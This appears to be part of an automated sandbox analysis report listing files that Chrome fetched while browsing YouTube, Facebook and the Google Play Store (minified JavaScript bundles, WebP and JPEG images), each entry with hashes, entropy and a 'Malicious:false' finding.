                                                                                                                                                                                                                                  URL:https://i.ytimg.com/vi/kqxAy363Pag/hqdefault.jpg
                                                                                                                                                                                                                                  Preview:......JFIF......................................................................................................................................................h....".........................................T........................!.1..."AQa.2q.#R......Bb...3r.....$S....Ts....4CDd..%c....................................7........................!1.AQaq......"...2.#.R..3BC..............?...Q@.QE.QE..E.P..Q@.QE.QE..E.P..Q@.QE.QE..E.P..Q@.QE.QE..E.P..Q@.QE.QE..E.P..Q@.QE.QE..E.P..Q@.QE.QE..E.P..Q@.QE.QE..E.P..Q@.QE.QE..E.P..Q@.QE.QE..E.P..Q@.QE.QE..E.P..Q@.QE.QE..E.P..Q@.QE.QE..E.P..Q@.QE.QE..E.P..Q@.QE.QE..E.P...8.......8.........N$z.4S...._...-.......i.R8..4.N.._.~..Z...._....Xu.X..h.o./.i.Z..'._...-8..8..5QN.......k-...~....qc.$z.TR.a>c..+h.s.......tS..w...y`.....~..Ww........`g'.v...T.H.^Lg.........v....r0.#.....).]E...$.$.O~].m..... .W..3.j.5T..EYE].?&k.8.Y.3.......f.+...I#...8...Z./.....$G.].........8...[...JP>G.O.k....s.R._....##<.EzG..c^).......:.~G.O8..........
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4413)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):70119
                                                                                                                                                                                                                                  Entropy (8bit):5.482416944401544
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:yRCgsRrWCaqcPCCB/HwWrWyt7wlwLBxDfiVjlhslrtiIG1XUAmPGiwNj9:yRCgqWCaq/CBP1xDfiVjVeS9
                                                                                                                                                                                                                                  MD5:90EBCEDEA8A84F7D95E2447FC91A0D54
                                                                                                                                                                                                                                  SHA1:BEF5971C8BD0ED27310B88E3564997B59CF8C7A7
                                                                                                                                                                                                                                  SHA-256:381B76E1A851B6355A701EE40DE603339C3F9B035A05EF22C671B89724214638
                                                                                                                                                                                                                                  SHA-512:89BB9242D90619E43D7F8082C286894462120ADD718CF2EF7B98E440ED6DBC5F56FF4DD5058DF7AA793DE4749C6EE58E52A143A0EF94FE5E7B1F7A4DD3146078
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3ivAx4/yo/l/en_GB/48NDuq1PGrS.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AbstractTextField.react",["cx","DangerouslyAccessReactElementInternals_DO_NOT_USE_IN_NEW_CODE","Keys","joinClasses","react"],(function(a,b,c,d,e,f,g){var h,i=h||b("react");a=function(a){"use strict";babelHelpers.inheritsLoose(c,a);function c(){var c,d;for(var e=arguments.length,f=new Array(e),g=0;g<e;g++)f[g]=arguments[g];return(c=d=a.call.apply(a,[this].concat(f))||this,d.state={focused:!1,value:d.props.defaultValue||""},d.onInputKeyDown=function(a){var c=d.props,e=a.keyCode,f=a.shiftKey;e===b("Keys").BACKSPACE&&!f&&c.onBackspace?c.onBackspace(a):e===b("Keys").TAB&&!f&&c.onTab?c.onTab(a):e===b("Keys").TAB&&f&&c.onBackTab?c.onBackTab(a):e===b("Keys").UP?f?c.onShiftUpArrow&&c.onShiftUpArrow(a):c.onUpArrow&&c.onUpArrow(a):e===b("Keys").DOWN&&c.onDownArrow?f?c.onShiftDownArrow&&c.onShiftDownArrow(a):c.onDownArrow&&c.onDownArrow(a):e===b("Keys").LEFT&&c.onLeftArrow?c.onLeftArrow(a):e===b("Keys").RIGHT&&c.onRightArrow?c.onRightArrow(a):e===b("Keys").RETURN?(c.onEnter
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2974)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5493
                                                                                                                                                                                                                                  Entropy (8bit):5.3972003055891165
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:98H8NJ808l8ch5h5Nlz/G0VsbQ6KTGgG2RlhUDxh66aTEoKTt:98H8D808l8i5h5NlzeIs5723hUjaAh
                                                                                                                                                                                                                                  MD5:AC310E9AA6803396643CC705D292081F
                                                                                                                                                                                                                                  SHA1:CA02EE3EFF60651EC231113F57924EFBD8600CBA
                                                                                                                                                                                                                                  SHA-256:2E008E8F51E7714B45C90B3F1EB9DC53ECE6D04CD36F230D94DC57CECC64E36E
                                                                                                                                                                                                                                  SHA-512:BE808436D234B818CD5B95EC40C74C61788C4F42411533A99ECE8C5E178D8EC91FEDA1A0A87D42894141EE085621A26BBD2156124DA9D1C1F989A0B38B415750
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("IntlCLDRNumberType03",["IntlVariations"],(function(a,b,c,d,e,f,g){"use strict";a={getVariation:function(a){if(a===0||a===1)return c("IntlVariations").NUMBER_ONE;else return c("IntlVariations").NUMBER_OTHER}};b=a;g["default"]=b}),98);.__d("IntlCLDRNumberType30",["IntlVariations"],(function(a,b,c,d,e,f,g){"use strict";a={getVariation:function(a){if(a%10===1&&a%100!==11)return c("IntlVariations").NUMBER_ONE;else if(a%10>=2&&a%10<=4&&(a%100<12||a%100>14))return c("IntlVariations").NUMBER_FEW;else return c("IntlVariations").NUMBER_MANY}};b=a;g["default"]=b}),98);.__d("JSResource",["JSResourceReferenceImpl"],(function(a,b,c,d,e,f,g){var h={};function i(a,b){h[a]=b}function j(a){return h[a]}function a(a){a=a;var b=j(a);if(b)return b;b=new(c("JSResourceReferenceImpl"))(a);i(a,b);return b}a.loadAll=c("JSResourceReferenceImpl").loadAll;g["default"]=a}),98);.__d("QpActionFalcoEvent",["FalcoLoggerInternal","getFalcoLogPolicy_DO_NOT_USE"],(function(a,b,c,d,e,f,g){"use strict
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (20398)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):354326
                                                                                                                                                                                                                                  Entropy (8bit):5.402542515680638
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:Wjx6Fh5yD6y2yjEKLPGMZMg9bV4XG77jzfwWEf8/:Wsv8D6y0KLPGMZZ9bVj7wWEf8/
                                                                                                                                                                                                                                  MD5:25E4014B07BBBA82DAF9E43D50280FB8
                                                                                                                                                                                                                                  SHA1:465FF25F0AACB572CD6F701D76CCBF3897951E65
                                                                                                                                                                                                                                  SHA-256:C92D4A3BB4BDC316E737064741F09C6079E8C5352E4D7E3286D9CD08329D8FAF
                                                                                                                                                                                                                                  SHA-512:79FB0B015225233A7CBB4391DEC5573F9EC274346129DDD24F3787F5CDB09370A839EC6C04629CEFC7CB1DC2DEB241FE2BDBD88AE2A9661D9983251AA93B32DF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/y1/r/s1oFVSwofs5.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/.."use strict";(function(){var a=typeof globalThis!=="undefined"&&globalThis||typeof self!=="undefined"&&self||typeof global!=="undefined"&&global;if(typeof a.AbortController!=="undefined")return;var b=function(){function a(){this.__listeners=new Map()}a.prototype=Object.create(Object.prototype);a.prototype.addEventListener=function(a,b,c){if(arguments.length<2)throw new TypeError("TypeError: Failed to execute 'addEventListener' on 'CustomEventTarget': 2 arguments required, but only "+arguments.length+" present.");var d=this.__listeners,e=a.toString();d.has(e)||d.set(e,new Map());var f=d.get(e);f.has(b)||f.set(b,c)};a.prototype.removeEventListener=function(a,b,c){if(arguments.length<2)throw new TypeError("TypeError: Failed to execute 'addEventListener' on 'CustomEventTarget': 2 arguments required, but only "+arguments.length+" present.");var d=this.__listeners,e=a.toString();if(d.has(e)){var f=d.get(e);f.has(b)&&f["delete"](b)}};a.prototype.dispatchEvent=function(a){if
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (12570)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):110588
                                                                                                                                                                                                                                  Entropy (8bit):5.284527927126575
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:dgxM88ofq9SwUu3aLYDfxnCFhRhpfvvrTxbM2Zgs1Keypi:OOJolwUmhC/RPfBD1Kemi
                                                                                                                                                                                                                                  MD5:04BBACBF1A57E9D2BD0EA3D9A0D51358
                                                                                                                                                                                                                                  SHA1:586A99D75A4A0EEFBE18D616DF5B9FACF84B5D4E
                                                                                                                                                                                                                                  SHA-256:F31A9F9C6587ECF268F553462016F2E3E335BE3A83C0C167E391BA5B7FC58092
                                                                                                                                                                                                                                  SHA-512:17DA648EB102098F27FA801A859C81A01F9B76630B1274DCF760A8509682942C67BD28527471256668B47AE710F8C9BE67494AF5E4974E68831918BFDD332F3D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("ARIA",["DOM","emptyFunction","ge","getOrCreateDOMID","joinClasses"],(function(a,b,c,d,e,f,g){var h,i,j=function(){h=c("ge")("ariaAssertiveAlert"),h||(h=c("DOM").create("div",{id:"ariaAssertiveAlert",className:c("joinClasses")("accessible_elem","accessible_elem_offset"),"aria-live":"assertive"}),c("DOM").appendContent(document.body,h)),i=c("ge")("ariaPoliteAlert"),i||(i=h.cloneNode(!1),i.setAttribute("id","ariaPoliteAlert"),i.setAttribute("aria-live","polite"),c("DOM").appendContent(document.body,i)),j=c("emptyFunction")};function k(a,b){j();b=b?h:i;c("DOM").setContent(b,a)}function a(a){for(var b=arguments.length,d=new Array(b>1?b-1:0),e=1;e<b;e++)d[e-1]=arguments[e];var f=d.map(function(a){return c("getOrCreateDOMID")(a)}).join(" ");a.setAttribute("aria-controls",f)}function b(a){for(var b=arguments.length,d=new Array(b>1?b-1:0),e=1;e<b;e++)d[e-1]=arguments[e];var f=d.map(function(a){return c("getOrCreateDOMID")(a)}).join(" ");a.setAttribute("aria-describedby",
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (20738)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):86597
                                                                                                                                                                                                                                  Entropy (8bit):5.7667639352954785
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:1S6F7vZeqFfh5kVEgpEI9Ps9Zlv4o5Iq7mGsq53Jttzp5QOyo:1S6F7vZeqNh5wEqFPKlvB9go
                                                                                                                                                                                                                                  MD5:6B7F0B1E0AF3E89F3D580DFB2E84082B
                                                                                                                                                                                                                                  SHA1:C3352E72C4CD682DF4B4DD8F14AD013578FC04CB
                                                                                                                                                                                                                                  SHA-256:1B03380EF0ED1C355563B423B11292507D9B0DF47FD1110D1E20A2A370AEB580
                                                                                                                                                                                                                                  SHA-512:164E81E1A9F7D6DC82AE2E627202908AB9ED3EC8EA2F9CDFD94206D8A19808A7DBEE461B303F41E45D95E7867327A5BEC17B569382008A7A427F4C639772C89F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AdsGetAdsHelpTrayOpenOnClick",["AdsHelpTrayUIActions","AdsHelpTrayUIProvider"],(function(a,b,c,d,e,f,g){"use strict";function a(a){var b=a.dialogWidth,e=a.forceNewWindow,f=e===void 0?!1:e,g=a.helpCenterID,h=a.source,i=a.onClick;return function(a){var e=f;if(b!=null){var j=b+c("AdsHelpTrayUIProvider")().helpTrayOpenWidth*2;window.innerWidth<j&&(e=!0)}e||(a.preventDefault(),a.stopPropagation(),d("AdsHelpTrayUIActions").pushCMSIDToHistory(g,h));i&&i(a)}}g["default"]=a}),98);.__d("AdsLearnMoreStrings",["fbt"],(function(a,b,c,d,e,f,g,h){"use strict";a=h._("Learn more");b=h._("Learn more");c=h._("people");d=h._("Learn more about Meta placements");e=h._("Learn about audience.");f=h._("Learn more about attribution settings");g.INLINE_LEARN_MORE=a;g.STANDALONE_LEARN_MORE=b;g.INLINE_PEOPLE_TEXT=c;g.PLACEMENTS_LEARN_MORE=d;g.INLINE_LEARN_MORE_ABOUT_AUDIENCE=e;g.INLINE_LEARN_MORE_ATTRIBUTION_SETTINGS=f}),226);.__d("GeoInvertedThemeProvider",["GeoPrivateInvertThemeContext","
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65475)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):805933
                                                                                                                                                                                                                                  Entropy (8bit):5.389545949651775
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24576:n8rP4RAXuhh2O0NVIWaAPngBeM4zULaDnNfkt6:neP4RAwh2O0NVIWaAPngBeM4zULaDnNr
                                                                                                                                                                                                                                  MD5:FEDF0A7355DA0EC2FD483C6269EDE396
                                                                                                                                                                                                                                  SHA1:3C16C7280C72CC23FB3E457F819A247F19C2D70B
                                                                                                                                                                                                                                  SHA-256:D21C20E127D8A461CF2D71D3004C0A00D721AC2510A0C4D930F5E7394B251540
                                                                                                                                                                                                                                  SHA-512:BA3440DD37005534DC400E900A88732EF6A6E1D5435DC9DCE020A7FA909FAEA6A52BAA6F915E165975FCCA878B0F14C9823D53CD5EFD4870C2B93F8BF6AD62DF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:/*! For license information please see hls.js.LICENSE.txt */.!function hy(py){const my=this;var e,t;e=this,t=function(){"use strict";var he,Q,K,e=e=>e&&e.Math===Math&&e,l=e("object"==typeof globalThis&&globalThis)||e("object"==typeof window&&window)||e("object"==typeof my&&my)||e("object"==typeof global&&global)||Function("return this")();class b extends Error{constructor(e,t,i,r,n,a){super(n),this.type=e,this.details=t,this.fatal=i,this.response=r,this.handled=!1,a&&(this.stack=a),n&&(this._message=n)}get message(){return this._message||(this._message=this.constructor.name+` code=`+this.response),this._message}}class pe extends b{constructor(e,t,i,r,n){super(e,t,i,r,n),this.response=r}}class d extends b{constructor(e,t){super(he.NETWORK_ERROR,Q.CERT_LOAD_ERROR,!1,e,t)}}const H={PlaylistNotReceived:-12884,CryptResponseReceivedSlowly:-16833,LivePlaylistUpdateError:-12888,NoResponseFromMediaRequest:-12889,IncompatibleAsset:-12927,CorruptStream:-16041,InternalError:-12645,CantSwitchInTime
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 166x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9316
                                                                                                                                                                                                                                  Entropy (8bit):7.975613114638196
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:rPrx5zvCwQ+82YfPGdlx9Rf15JqIWGdK3Sd2MGy/ly4XA:rPFlvS+ZYXGnR95JfPGy/Xw
                                                                                                                                                                                                                                  MD5:8FC6DE8717489411CDE6604CF116FEA1
                                                                                                                                                                                                                                  SHA1:B3EF77BC017EA29750E2B30B965BAEFEB7A71E0F
                                                                                                                                                                                                                                  SHA-256:B996916C905C959327C530A288D6BA58E3B8AE37BF27CBB77467E97E3139EBC8
                                                                                                                                                                                                                                  SHA-512:05A1F23E2AD89410F45C40B06346ACA17582EADC2EEA1AA113A7C100DBE68EC18315A50650BAAE39A9C6F2EF1F9B28224F3102E3A166022D218D19CC93415303
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF\$..WEBPVP8 P$...~...*..(.>Q".E#.!..V48...7~>=...3_.........9~.......j...;.w.'w.......?.._.k.e.{...........H...`........_.?.{...........P......{W.................?.....p>..d..{..............j.............u5.o........#.o..#.......w....E..w.m?.?...z......=N~#.g..^...j...W.S....|.........._...?...~.}3.K......J.........'..................u.......uW....cX.Eq.O....z.T0....rs.h.)o..!.Z..c....=P..w.g....!-..N.RN.P#.0...4!X....D.J..G.P3...f....L:.@....v\....,.......,..r..G$...M.k".>.v.b......[.5.1B.q..../K.....Xv2..~u.@..........M}?d].....-.....J_.Sot?.[fMxB..nUu.qJ[{[....R1.....K...z..;{|.......q.\.k.s...f.{....d...\....8.;...o9..J|.[...W...Z..i...0.f.G.........O...c,y.....7.._....)..I.".&....+..t.....0.>..FW...,....B8&.c.3zS..{)5.....rmR.&s...F...!......u...de7...*...F.=.`}o'.........M..r....}.......{)....c..'.^Qja..c.....pFnY'5r.*Lg){...L...g.....$._.`...I.....0...I/.... ...Q......@t.M-s...G@YAI..L%fP.&) ..m.g<.!^.A25.Z....B..{.,.f.....j.q.q...,.,l] ..'k.l
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):339
                                                                                                                                                                                                                                  Entropy (8bit):5.166444981382201
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvnuxPRoj9QAuGNG/QVIKZhiGXUOwQRaNw6JpyxZRNlad0:kRZTFuHc9vI/AIGiIAkbRN20
                                                                                                                                                                                                                                  MD5:0E71399CDB7CBD53DE1B7162D3DFB6FA
                                                                                                                                                                                                                                  SHA1:6A69118D5BF45EF956D0FB22C1ACFD0D64D62441
                                                                                                                                                                                                                                  SHA-256:C10B353FA728624E182F457C78A09A76A2DE0F550D10F85B431A31FBE2CFBA98
                                                                                                                                                                                                                                  SHA-512:DD28822F64B039862FB37E1F07BA22BDB8878354D7DC99BB8BB9D2E0370645F54000005D6652CB2AE04745F20EF3E5EA494EBC62B1BDBB0E4EB4FAFBAB0F4BC5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,BfdUQc,C7e1Kc,CKm2Wb,EEDORb,EFQ78c,ElYdAc,FoxcOd,FuzVxc,GjTCAc,GkRiKb,HnDLGf,I8lFqf,IJGqxf,IZT63,IcVnM,JNoxi,KUM7Z,L1AAkb,LCkxpb,LEikZe,LcQwud,Lkzi5d,M2Qezd,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NkwaS,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6sQOc,PHUIyb,PZ1hre,PrPYRd,QIhFr,RBsfwb,RMhBfe,RQJprf,RqjULd,SdcwHb,SpsfSb,UINLVc,UUJqVe,UZStuc,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,XVMNvd,Z5uLle,ZDZcre,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,chfSwc,dfkSTe,e3Zld,e5qFLc,ebZ3mb,fKUV3e,fPcQoe,g6aYuf,gKWqec,grWkAb,gychg,hKSk3e,hc6Ubd,iAQMie,iLGjNb,kJXwXb,kWgXee,kjKdXe,kpVlPe,kr6Nlf,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,mmmrlc,n73qwf,oEJvKc,ovKuLd,pCKBF,pQUyNd,pYCIec,pjICDe,pw70Gc,q0NEmc,q0xTif,qczJ2b,qqarmf,qyd4Kb,rpbmN,s39S4,sOXFj,soHxf,tKHFxf,uj8DUc,vrGZEc,w9hDv,wW2D8b,wg1P6b,ws9Tlc,xQtZb,xUdipf,xii62b,yDVVkb,yNB6me,ywOR5c,z5Gxfe,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=kdbckd"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("kdbckd");._.qr(_.Uza,class extends _.rr{constructor(a){super(a.ta)}H(){return"kdbckd"}N(){return!0}Xa(){return _.awc}});_.$q.kdbckd=_.ZPa;._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (60871)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):97946
                                                                                                                                                                                                                                  Entropy (8bit):4.976414433545297
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:8mrgoskJlsmFUMsvRYoNgCWflnkO6snajeQO7:8mrBkW76ORJ
                                                                                                                                                                                                                                  MD5:79ABB7A1082240DD4B465B9FF64989C5
                                                                                                                                                                                                                                  SHA1:3F81542C95E0B17EE41217FF9C11C49A08BE9A53
                                                                                                                                                                                                                                  SHA-256:B2ECAC9C8D644496B78DDA8D634E164BBA72F1C8B5B4F841B5B913DEEB399682
                                                                                                                                                                                                                                  SHA-512:95C18CD0B04C2366FC195082E47B38D77FC9D73AA701EAF09EB04158510FB6C8F0E3C6E86AFAC876A582DD7AD570DF5B0EBB4E7FF327EF92F287CC4205C3A1B2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/yr/r/EIi3C0sPHQ2.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("ProtonColors",["cssVar","color"],(function(a,b,c,d,e,f,g,h){"use strict";var i=!1;function j(a){try{return c("color")(a)}catch(a){return i?c("color")("#000000"):null}}a=function(a,b){a=j(a)||c("color")("#000000");return a.alpha(b).string()};b={white:"#ffffff",black:"#000000",neutral0:"#f9f9fa",neutral10:"#f3f3f6",neutral20:"#edeeef",neutral30:"#e6e8ea",neutral40:"#dee0e4",neutral50:"#d6d9dd",neutral60:"#cdd1d7",neutral70:"#c4c9d0",neutral80:"#bac0c9",neutral90:"#b0b7c2",neutral100:"#a5aebb",neutral110:"#99a4b4",neutral120:"#8d99ad",neutral130:"#808fa6",neutral140:"#72839e",neutral150:"#637797",neutral160:"#596c8c",neutral170:"#4f6182",neutral180:"#455778",neutral190:"#3c4c6d",neutral200:"#334162",neutral210:"#293657",neutral220:"#212b4a",neutral230:"#18203c",neutral240:"#0f142a",darkNeutral0:"#e2e4e8",darkNeutral10:"#d5d8df",darkNeutral20:"#c7cbd4",darkNeutral30:"#b7bcc8",darkNeutral40:"#a8adbc",darkNeutral50:"#9aa0b1",darkNeutral60:"#8c94a8",darkNeutral70:"#808
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):149756
                                                                                                                                                                                                                                  Entropy (8bit):7.989238660408578
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:VcA3uwoHMMbvFz64XTGbnzQd3jGFqtIlL40yf15Q:VtuwosMbNz6Up3tIh2jQ
                                                                                                                                                                                                                                  MD5:E05D2BCF282C4E29A516688740FAEE8D
                                                                                                                                                                                                                                  SHA1:65820D150DABE2D37AF5DAE46197719839D080A8
                                                                                                                                                                                                                                  SHA-256:F0B676B1B1AF7B64C39271D887DC07E70F8FEAF475A7D459B6DB30F258FDA4AB
                                                                                                                                                                                                                                  SHA-512:FB7F833AC8C12FCF9873C1308994B68CE1E5AA70118B4CA545AA54531449437823E0FC93867BD0C7EF556CF6B9C8ABD47E22DCEAC188E79305D0A8BADE01B65A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF.H..WEBPVP8L.H../..I.MH.d;l..G..@......$.D......:...T].t_w......{..9....ZU............}%..Zk...d.@.}....y......$%]H...Z.^.....u:)]...j..QUwGj..$2V......8......7..b........v.....W.ZIK.&~...H.V..F.6...)I..Fz$....F...I.!......}.e{.K....;czs.l.......~......o1..uB../.9g...........G.1.d;.W......hc.=......R.@.@P3YF.| ..s.....)-......,$.w...=Y........k...N.I.Z+F...\u .I.Z.I..n.0:..I@Fw7H......f.>4.R.|.|....l.$k.....|h.Ef'.t.Ww.$y.D...K..+IV.m.Z.s!.CG.... $..Iw.1j.. .Y.`$i...7.d.4.a..b...@..p....... . ].w......v...?...B..K.u...d.^..\W.....G. .$.$...V.....3.*i&.$.HI.*...wU....<d.SJ.(....9.ZS..[...|AK.$I.......g..5I.$F.8....,g.l{..m]..D.........B=.G....Q.....L..E.!.0.m.n....$.rZy..}.W...Pv.9-Z..Ap....?...~N...[..H....B..R.....a...x(.p....\......*..........#.S........E..!...............".< PB?.X...!.xK7G..........@....A:`wpp$.....P@C..\7Y...........m....n...3..O......B... .a...p.......!....?"5.+.....[.n.?\......3gn..wq......9sk...E1$U(&d,P...
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 166x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10246
                                                                                                                                                                                                                                  Entropy (8bit):7.978999223454442
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:v7jJbSUZezdwCm4Wx+Xz6IVVfrF2LNaCvVnBlhZBRnQ9MuLl9kJbzJT+XQt6egP2:v7jVwqCm8RbrONaCtBrXRn09kJbEg
                                                                                                                                                                                                                                  MD5:7645FD5C78AC035544B12627574D410B
                                                                                                                                                                                                                                  SHA1:3F70DC0F130CC0D29EA09ADFD62FF9C525BF2EA6
                                                                                                                                                                                                                                  SHA-256:AD79026C7E873DCA90C2DB7D126F63B3A29BC5F5A30C787A63B5C65BFEF17D66
                                                                                                                                                                                                                                  SHA-512:33BCD63593F476E4486C8328231F0C28C84808927E3AB8668B91B597B6053C8B69B5EEE5E15CEEB5F05C95335708870C449BF23ADCD72709CDF0CF1E19B82CB5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF.'..WEBPVP8 .'......*..(.>U$.E#.!..8.D.7n..0....~]w.w.!..........c.g._..p.a...?2..|.............?N?..R.o...................~.{......_..w........._.?........6.....K._.S....._P...a.s...../..<|_.;.O...^...._x.E......~..j...;.....5..v.....E..................h?.{../.....+..............a.s........}4.k.k...G...?....9.......w..........=.[./...7.....Ca....Ti.Rt.o2.v.o.}.f...x....'[qt/...E_,....|...7..........P.Q..l.........R.-.....G...L...5.|s.+...z.O.[...dz....b...6.Ku.C...Y..[.V...ea.'.V..y....n.V.?...]W.:.O.}..P.?........d.#LO.h.......:.^.,......:.+..%.....h9q.t...{*.20.ca.NNjm.k..U....P..6..aM.....Q.f..8B...D@..}k......V.yn..b..w....(.,m...d.....+j.n./5k.C?a.ht.W..I...|.-I8.....;$v.3B..;~...JcS.Og.Y.,4.F.P4..QR..P+U-Cq\....8..M......8.z.C|c.UDx|D.^.....s..I.L.M.Url6..r]......GN.C..I .I...HX..u+h".k...-.......`..oMJD.|.Z&...t-y.T...gJ9 .^jM.n.;.Y...I.C..{*.su[....l.iBo9...r..N.@k...{l?..'..$..V;DI..R.7X.|..L%.8.......,.....W+...X,swp>l.Y.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
